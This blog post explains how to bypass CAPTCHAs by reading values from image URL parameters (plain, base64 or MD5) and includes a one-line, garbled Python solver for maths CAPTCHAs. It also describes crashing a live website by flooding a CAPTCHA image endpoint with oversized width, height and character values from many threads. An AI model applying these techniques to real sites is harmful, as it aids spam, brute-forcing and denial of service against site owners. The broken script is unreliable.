Bypassing & Exploiting CAPTCHA

We live in a world where we need to prove to machines that we are humans. Pathetic! But before we take revenge from these puny machines, lets learn how CAPTCHAs work.
How CAPTCHA works? First of all the full form of CAPTCHA is “ Completely Automated Public Turing test to tell Computers and Humans Apart “. Why would you give such a long name to a program? Like just call it Jeff or something. Anyways, a classic CAPTCHA looks like this

                                 captcha example

The user is presented with some randomly generated words or characters which need to be submitted to the web app. If the value entered by the user matches the value generated by the web app, the user is allowed to do whatever he was trying to do. CAPTCHAs are mostly placed in forms to stop spammers, bots & brute forcing attempts.
Most of the CAPTCHAs you are going to encounter in the wild will be of following nature:
  • The ones which ask you a simple maths question
  • The ones that ask you to copy paste some text
  • The ones which ask you enter some randomly generated characters
  • The ones which ask you to select images or something like that

How to bypass CAPTCHA?

First of all, why would someone use maths questions and copy paste thing? Yes it is easy to bypass. Most of the times you will find this type of CAPTCHA on small or medium scale websites. But believe me it stops most of the spammers because most of the times their bots are automated and ain’t nobody got time for tweaking their bot for every website. But if its a target for a spammer, he will do it and that’s why if you are testing a website and find this kind of CAPTCHAs, report it.
Here’s an example of a script that can solve a maths question

import requests # library for making http requestsimport re # regex library bypass(url): response = requests.get(url).text # make request to the page & retrieve response match = re.search(r'(\d)\s(.)\s(\d)') # extract the numbers & operator with regex first_number = match.group(0) # Things only operator = match.group(1) # regex peeps second_number = match.group(2) # would understand if operator == '+': # if the operator is + return first_number + second_number # add the numbers if operator == '-': # if the operator is - return first number - second number # subtract the numbersbypass('https://target.com/registartion.php')
Here comes the part you are here for, the CAPTCHAs which ask you to enter characters.
Well the first thing you should do is to check the source to see how the CAPTCHA is generated. If you something like the following, its an instant win!
https://example.com/apis/captcha.php?gen=31sa9
CAPTCHA’s value is included in the URL as a parameter value, just grab it and submit it.
But what if you encounter this?

https://example.com/apis/captcha.php?gen=c3Vja215ZGljaw==

No worries! Sometimes the value will be encoded like this one which is encoded in base64. Just decode it and submit it.

Here’s another one
https://example.com/apis/captcha.php?gen=1d2a33a595d1c7a313a080f527476e55

Here the value is encrypted in MD5 and you can’t just “decode” it as its aone way encryption. Your best bet is to write a script that extracts the hash and then tries to do a hash lookup with some online service. Check out my Hash-Buster :wink: If the hash gets resolved just submit it otherwise just reload the page and try again.

Okay, here’s another one
https://example.com/apis/captcha.php?gen=lkacksa&x=8

I won’t solve it for you, let me know in the comments how to do this one.
Apart from the CAPTCHA image url, check if there’s some JavaScript interacting with the CAPTCHA and try to understand how it works & try to bypass it.
Yeah one more thing, you can refresh the CAPTCHA again and again to see if its truly random. If the CAPTCHA is being submitted through a HTTP request, you can try to remove the CAPTCHA parameter to see how the server responds to it.
That’s all for bypassing. Now lets talk about a scenario where I exploited a CAPTCHA vulnerability to cause a powerful DDOS attack.

How to exploit CAPTCHA?

About a month ago I found this while testing a website:
The characters present in the CAPTCHA image image aren’t being exposed in here but take a look at the url of the image

https://example.com/page/captcha.php?width=115&height=40&chars=5

As you can see, there are 3 parameters
width: width of the image to be generated
height: height of the image to be generated
chars: numbers of characters to be generated

Without wasting any more time I opened the url in a new tab and changed the value of width parameter. Guess what? It generated a wider image! Yay!

To exploit this behavior I wrote a script to request the following URL in lots of threads

https://example.com/page/captcha.php?width=2000&height=1200&chars=9999 and the website went down in less than a minute because the server had to generate a 2000×1200 image with 9999 random characters with rendered noise in it and its a lot of work which caused the server to crash.

Credit of this method goes to Somdev Sangwan

No comments

Powered by Blogger.